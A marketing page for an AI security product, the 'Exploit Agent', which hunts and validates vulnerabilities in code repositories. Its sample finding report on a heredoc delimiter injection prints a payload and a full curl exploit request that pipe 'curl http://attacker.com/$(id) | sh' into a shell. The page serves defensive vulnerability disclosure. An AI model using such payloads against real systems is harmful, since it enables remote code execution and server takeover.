ISO 27001 CertifiedSOC 2 Compliant A product by Visit the Trust Center
Agent 05 · The Exploit Agent

An AI security engineer for your lean team.

Connect a repo and the Exploit Agent reasons like an attacker: it indexes the code, builds a threat model, sets 23 specialist workers hunting, then proves each finding with a working exploit. Not a scanner spraying alerts; a teammate who ships confirmed, fixable bugs.

The agent, thinking

Watch it hunt, the way a pentester would.

From a fresh clone to a confirmed remote-code-execution bug and an open pull request. This is the Exploit Agent reasoning through one run, condensed.

Exploit agent · reasoning live
23
Specialist workers hunt in parallel, each an OWASP-class expert
0
“maybe” findings, every result is validated and proven
1
Engineer’s workload, done by an agent that never gets tired
The product · live view

Your whole AppSec posture, on one screen.

This is the dashboard your team signs into: a security score for every repo, what’s open, what’s actually exploitable, and every scan the crew runs, streaming in live.

Simulated data · product preview

The squeeze

Your whole app. One security engineer. Maybe.

Lean teams ship faster than they can review. Pentests are a once-a-year snapshot; scanners drown you in maybes that someone still has to read. The gap between “code shipped” and “code checked” is where breaches live.

01

Too much surface

Every route, dependency and workflow is attackable, and it grows with each merge.

02

Too few people

Most teams have no dedicated AppSec engineer, let alone one per repository.

03

Too much noise

Traditional scanners pattern-match and cry wolf. The real bug hides in the false-positive pile.

Set up

Connect a repo. Point it at what matters.

Connect GitHub, pick a repository and branch, then choose how deep to go. Run a full scan, or just open a session and ask, in plain language, for exactly the classes you care about. The agent works on precisely that.

acme/api-gatewaymain Idle VenusHawk Agents
Try
Ask the crew a security question — name the vuln class and the area, or call a worker by name… ⌘⏎

Simulated data · product preview · pick a starter prompt to run the crew

Repo config

Branch, investigation depth, full-scan or interactive, review scope before the run, and model selection.

Interactive session

Ask for specific vulnerability classes in plain language; the agent works on exactly that.

Smart scope

Auto-deselects example, test and non-shipped code, focusing on what actually ships. Narrow to folders when you want.

Live exploitation (beta)

Point it at a sandboxed deployment to safely validate impact end-to-end.

Step one

It reads your code before it hunts.

The agent indexes the shipped application code and builds a threat model, assets, trust boundaries, entry points and the classes most likely to bite. Every worker that follows hunts this map, not a generic checklist.

app.venushawk.ai/code/threat-model · acme/api-gatewayContext agent
Indexing shipped application code214 files
Deselecting tests, fixtures & examples−63 files
Mapping entry points & trust boundaries38 routes
Ranking files by likely bug classby risk
Node.js Express React PostgreSQL
Entry points
38 routes, 12 accept untrusted input
Trust boundaries
Public API, authenticated API, admin console, background worker
Assets at risk
Customer records, credentials, cloud metadata, CI secrets
Focus classes
Command injectionSSRFIDORRCEXSS
Step two

A planned team of specialists, not a scanner.

A planner agent decides who works. Twenty-three specialist workers, each an expert in one bug class, hunt in parallel and emit candidates. Breadth no single reviewer could hold in their head, running at once.

specialist-workers · 23Planner · 4 hunting in parallel
—idle
—idle
—idle
—idle
SQL injectionNoSQL injectionCommand injectionSSTIXXEPath traversalStored XSSReflected XSSDOM XSSCSRFOpen redirectSSRFIDORAuth bypassPrivilege escalationInsecure deserializationRace conditionMass assignmentLDAP injectionHeader injectionUnrestricted uploadJWT flawsBusiness logic
0 candidates emittedqueued for validation
A planner agent decides which specialists run against this codebase, and each one emits candidates, never verdicts. Nothing is a finding until the validator agrees.
Step three

A validator kills the noise.

Every candidate is re-read in batches of ten. The validator checks for framework defences, ORM prepared statements, template auto-escaping, auth middleware, and confirms or rejects each one with a written reason. This is why the results are worth reading.

Validator · batches of tenframework-defence aware
CONFIRM
Heredoc delimiter injection → RCEUser input reaches a shell heredoc; no framework defence on the path. Exploitable.
REJECT
Reflected XSS candidateReact auto-escapes this render path. Not exploitable, rejected with a written reason.
CONFIRM
IDOR on /api/records/:idNo tenant check before the read; cross-tenant access confirmed.
REJECT
SQL injection candidateParameterised through the ORM’s prepared statement. Safe, not a finding.
PENDING
Borderline SSRF candidateAmbiguous defence; re-surfaced for human review rather than silently dropped.
Over-rejection recovery re-surfaces borderline candidates as pending review, a real bug is never silently dropped.
Every finding, proven

Not “maybe”, here’s the exploit.

A confirmed finding lands with everything an engineer needs to fix it and a reviewer needs to trust it: the vulnerable line, a working exploit, the impact, and a code-level fix ready to open as a PR.

CRITICALVH-EB5EB507Exploitable · PoC ready
Heredoc delimiter injection → RCE via mailbox display-name field
CategoryCommand injectionCWECWE-78Locationpsql-runner.ts:169ConfidenceHigh
Investigation report · agentic crew
Summary

The transaction() function in psql-runner.ts constructs a bash heredoc command string to pipe SQL statements to psql over SSH. The heredoc uses the fixed delimiter __EXAMPLE_SQL_EOF__. The SQL body passed into the heredoc is built by joining caller-supplied SQL strings — including values derived from the user-controlled name field of a new mailbox. If an attacker embeds a newline followed by __EXAMPLE_SQL_EOF__ in the display name, the heredoc is terminated prematurely and any text after it is executed as an arbitrary shell command on the mail server, running as the postgres user (via sudo). This is a direct path to RCE, and it can be triggered by any low-privileged user of the same organisation who is able to create a mailbox — no admin role is required.

Code-level explanation

The vulnerable heredoc construction is at psql-runner.ts:169:

psql-runner.tsTypeScript
1// psql-runner.ts  (apps/api/src/modules/mail/admin) · lines 160–172
2export async function transaction(
3  serverIdOrExec: string | CommandExecutor,
4  statements: string[],
5): Promise<void> {
6  const body = ["BEGIN;", ...statements.map((s) => s.replace(/;?\s*$/, ";")), "COMMIT;"].join("\n");
7
8  // VULNERABLE: body is interpolated directly into the heredoc.
9  // If body contains "\n__EXAMPLE_SQL_EOF__\n", the heredoc closes early
10  // and anything after it is executed as a shell command.
11  const cmd = `sudo -u postgres psql -d vmail -A -t -v ON_ERROR_STOP=1 <<'__EXAMPLE_SQL_EOF__'\n${body}\n__EXAMPLE_SQL_EOF__`;
12
13  await runCmd(serverIdOrExec, cmd);
14}

The body variable is assembled from statements, which include SQL built from input.name in mailboxes.service.ts:174:

mailboxes.service.tsTypeScript
1// mailboxes.service.ts · lines 170–182
2await transaction(exec, [
3  buildInsertMailboxSql({
4    username,
5    passwordHash: hash,
6    name: input.name ?? "",   // <-- user-controlled display name
7    domain: input.domain.toLowerCase(),
8    quotaMB,
9    storagebasedirectory: layout.storagebasedirectory,
10    storagenode: layout.storagenode,
11    maildir: layout.maildir,
12  }),
13  buildInsertSelfForwardingSql(username, input.domain.toLowerCase()),
14]);

The q() function (psql-runner.ts:39–41) only escapes single quotes (' → ''). It does not escape newlines. So a name value such as x'\n__EXAMPLE_SQL_EOF__\ncurl http://attacker.com/$(id)|sh\n#, after q() wrapping, produces a SQL string literal that contains a literal newline and the heredoc terminator — breaking out of the heredoc and injecting a shell command.

Data flow
POST /admin/mailboxesadmin.controller.ts:344
req.body.name (newline + delimiter)
createMailbox(input)mailboxes.service.ts:174
buildInsertMailboxSql(name)
transaction(exec, [sql])mailboxes.service.ts:170
statements joined into body
heredoc cmd constructionpsql-runner.ts:169
heredoc broken · shell injection
exec.exec(cmd) over SSHpsql-runner.ts:171 → RCE as postgres
How an attacker exploits it

Precondition. The attacker is a low-privileged user of the same organisation with permission to create a mailbox — no admin role or elevated API token is required.

  1. Attacker identifies the mailbox-creation endpoint, e.g. POST /admin/mailboxes.
  2. Attacker crafts a name field containing an embedded newline, the heredoc terminator, and a shell payload:
innocent name
__EXAMPLE_SQL_EOF__
curl http://attacker.com/$(id) | sh
#

Then the attacker sends the request:

exploit.shbash
1curl -X POST https://<target-host>/admin/mailboxes \
2  -H "Authorization: Bearer <org-user-token>" \
3  -H "Content-Type: application/json" \
4  -d '{
5    "localPart": "pwned",
6    "domain": "example.com",
7    "password": "Hunter2!",
8    "name": "innocent name\n__EXAMPLE_SQL_EOF__\ncurl http://attacker.com/$(id) | sh\n#"
9  }' 
  1. The server calls transaction(), which interpolates the name (via the SQL built by buildInsertMailboxSql) into the heredoc body.
  2. The shell sees __EXAMPLE_SQL_EOF__ on its own line, closes the heredoc, and executes curl http://attacker.com/$(id) | sh as the postgres user (via sudo -u postgres).
  3. The attacker receives a callback with the output of id and can execute arbitrary commands on the mail server.
Impact

Any low-privileged member of the same organisation can execute arbitrary shell commands on the mail server as thepostgres user (via sudo). This gives full control of the mail database and, depending on the sudo configuration, potentially full root access to the mail VPS. All mailbox data, credentials, and mail content are at risk of exfiltration or destruction.

Remediation

Do not interpolate untrusted data into a heredoc body. Pass SQL to psql via a temp file written with a random name, use psql’s -c flag for single statements, or pipe via stdin without a heredoc. If the heredoc approach must be kept, validate that no statement contains the delimiter before constructing the command, and use a randomly generated delimiter that cannot be predicted or injected.

psql-runner.tsTypeScript
1// Before (psql-runner.ts:169)
2const cmd = `sudo -u postgres psql -d vmail -A -t -v ON_ERROR_STOP=1 <<'__EXAMPLE_SQL_EOF__'\n${body}\n__EXAMPLE_SQL_EOF__`;
3
4// After: write SQL to a temp file with a random name, then execute
5import { randomBytes } from "crypto";
6const tmpFile = `/tmp/example_sql_${randomBytes(16).toString("hex")}.sql`;
7// Upload body to tmpFile via SFTP/exec, then:
8const cmd = `sudo -u postgres psql -d vmail -A -t -v ON_ERROR_STOP=1 -f ${tmpFile}; rm -f ${tmpFile}`;

Alternatively, assert no statement contains the delimiter before use:

psql-runner.tsTypeScript
1// Defensive guard (belt-and-suspenders, not a replacement for the above)
2const DELIM = "__EXAMPLE_SQL_EOF__";
3if (statements.some(s => s.includes(DELIM))) {
4  throw new Error("SQL statement contains forbidden delimiter sequence");
5}
CVSS 3.1
0.0
CRITICAL
AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
AV · Attack vectorN
AC · ComplexityL
PR · PrivilegesL
UI · User int.N
S · ScopeC
C · ConfidentialityH
I · IntegrityH
A · AvailabilityH
Exploit, spelled out
Location, category, confidence, a code-level explanation and exactly how an attacker exploits it, with a concrete curl command, HTTP request or exploit URL.
Code-level remediation
Impact plus a specific fix, ready to open as a pull request.
CVSS you control
Adjust the score if the agent over- or under-claimed; your correction becomes org-wide knowledge.
False-positives that learn
Mark a finding false with a reason and the org knowledge base fact-checks similar findings next time instead of repeating.
Beyond the code

The whole software-supply picture.

The same investigation covers everything around the code, then hands off to live pentesting when you want it proven against something running.

Dependencies & CVEs

A CVE-verification agent runs reachability analysis, is the vulnerable path actually reachable?, and flags supply-chain risk with a written verdict.

Secrets

Secret detection across the codebase, including older commits in history.

IaC, headers, SBOM & EOL

Infrastructure-as-code and header issues, SBOM export, and end-of-life component detection.

Code quality

Lint, complexity, dead code and documentation gaps.

Wiki & codebase context

Auto-generated architecture wiki, dataflow diagrams, entry points, dangerous sinks and auth/authz flows, per module and per repo.

GitHub Actions

Scans your CI/CD workflows for insecure configuration.

Codebase context

It maps the whole codebase, not just the bug.

A context agent indexes every shipped file into a reusable map, entry points, dangerous sinks, auth and access patterns, so the next scan starts already knowing your code.

Codebase Context · context agentmapping 75 files…
0
Files analysedIndexed for context
0
Entry pointsReachable handlers
0
Dangerous sinksHigh-risk operations
0
Validation layersSanitisation points
Auth 26Entry point 23Template 12Data access 6Utility 4Business logic 2Validation 1Config 1
Entry points41
paypal/api/webhook.tsreq.body — JSON event payload from PayPal
stripepayment/api/paymentCallback.tsreq.query.callbackUrl — open-redirect check
_utils/oauth/decodeOAuthState.tsstate param from external identity providers
Dangerous sinks21
BookingPageTagManager.tsxdangerouslySetInnerHTML with parseValue(script.content)
paypal/api/webhook.tsverifyWebhook cert_url from untrusted header
intercom/lib/isValidCalURL.tsfetch(url) on user-supplied URL after regex check
Living documentation

Every repo gets a wiki that writes itself.

A wiki agent documents the whole codebase, architecture, dataflow, core components, workflows and security, and keeps it current on every scan.

Wiki · cal.diy
cal.diy Wiki
Written by the Wiki Agent — a live index of every module, flow and surface in this repo.
Wiki Agent24 min read4,797 words44 sections
Introduction & Architecture

Cal.diy is a self-hosted, MIT-licensed scheduling platform built on Next.js, tRPC, React, Prisma and PostgreSQL. It is organised as a Yarn monorepo whose app-store package plugs 50+ third-party services — calendars, video, CRMs, payments and analytics — into the core booking flow.

High-level data flow
User / Booking Page
render booking page
BookingPageTagManager · injects analytics
interpolate tracking IDs
dangerouslySetInnerHTML
On this page
  • Introduction & Architecture
  • High-Level Data Flow
  • Core Components
  • Data Model & API
  • System Workflows
  • Error Handling & Security
  • Summary
Prove it live

From plausible to proven, in a sandbox.

Turn on live exploitation and the agent runs its findings against a sandboxed deployment, safely firing the actual exploit and keeping a full verification log. A finding stops being an argument and becomes a fact.

Live exploitation · sandboxIsolated target · verification log
EX-2231IDORGET /api/patients/1042 returns another tenant’s record.Probed in isolation; cross-tenant read confirmed · CVSS 8.1. Exploitable
EX-2228SSRFImport-by-URL reaches the cloud metadata endpoint.Reached 169.254.169.254 in the sandbox; credential path mapped. Exploitable
EX-2225RCEThe YAML parser executes a shell heredoc from user input.Command executed safely in the sandbox; blast radius captured. Exploitable
Why it’s different

It thinks like the attacker, not the linter.

Scanners match patterns and hope. The Exploit Agent reasons from a threat model to a working exploit, and learns from your team as it goes.

Hacker’s mindset
Starts from a threat model and attacker goals, not a rule list, so it finds logic and chained bugs scanners miss.
Proof, not probability
Every finding is validated, and optionally exploited live. No triage pile.
Defence-aware
Understands the frameworks in your stack, so it stops crying wolf at safe code.
Learns your org
CVSS corrections and false-positive marks become shared knowledge across every future scan.
End to end
Code, dependencies, secrets, IaC and CI/CD, one investigation, one report.
Part of the constellation
Hands findings to the Attack Surface and Network agents to show real blast radius.
Pricing

Priced by outcomes. Never by seats.

VenusHawk isn’t sold by the developer. There are no seats to buy, no minimum order, and no cap on how many engineers touch the code. You equip one agent with your repositories and pay only for the work it does, in VenusHawk Credits, as you go.

The seat model

Priced by headcount

  • Pay per developer seat, used or not
  • Minimum seats and annual lock-in
  • Every engineer you add inflates the bill
  • Idle licences, wasted budget
VenusHawk Credits

Priced by work done

  • One agent, equipped with all your repositories
  • Pay as you go, credits, never seats
  • No minimums, no cap on developer seats
  • Your bill tracks how hard you put the agent to work
Developer seats
∞
There are none to buy, ever — every engineer is covered
Minimum order
0
Start any size, scale at your pace
Agent
1
Equipped with every repo you point it at

The more of your ecosystem you hand it, the more it finds, and you only ever pay for that work. Outcome‑oriented, not licence‑oriented.

Early access

Bring this agent into your constellation.

VenusHawk is rolling out to lighthouse customers and design partners. Tell us a little about your environment and we’ll see how we can accommodate you.